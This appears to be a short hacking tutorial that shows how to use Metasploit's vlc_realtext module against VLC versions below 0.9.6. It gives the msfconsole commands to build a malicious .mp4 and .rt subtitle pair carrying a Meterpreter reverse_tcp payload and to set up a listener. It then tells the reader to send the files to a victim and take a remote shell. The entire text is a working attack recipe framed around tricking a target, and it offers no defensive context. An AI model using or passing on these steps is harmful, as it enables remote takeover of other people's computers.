This module exploits a stack buffer overflow vulnerability in Video LAN VLC < 0.9.6. The vulnerability exists in the parsing of Real Text subtitle files. In order to exploit this, this module will generate two files: The .mp4 file is used to trick your victim into running. The .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file.
VLC Media Player 0.9.6
Windows XP SP 2
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/vlc_realtext
Msf exploit (vlc_realtext)>set payload windows/meterpreter/reverse_tcp
Msf exploit (vlc_realtext)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (vlc_realtext)>exploit
After we successfully generate the malicious MP4 File, it will stored on your local computer
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
Now send your msf.mp4 and msf.rt both files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
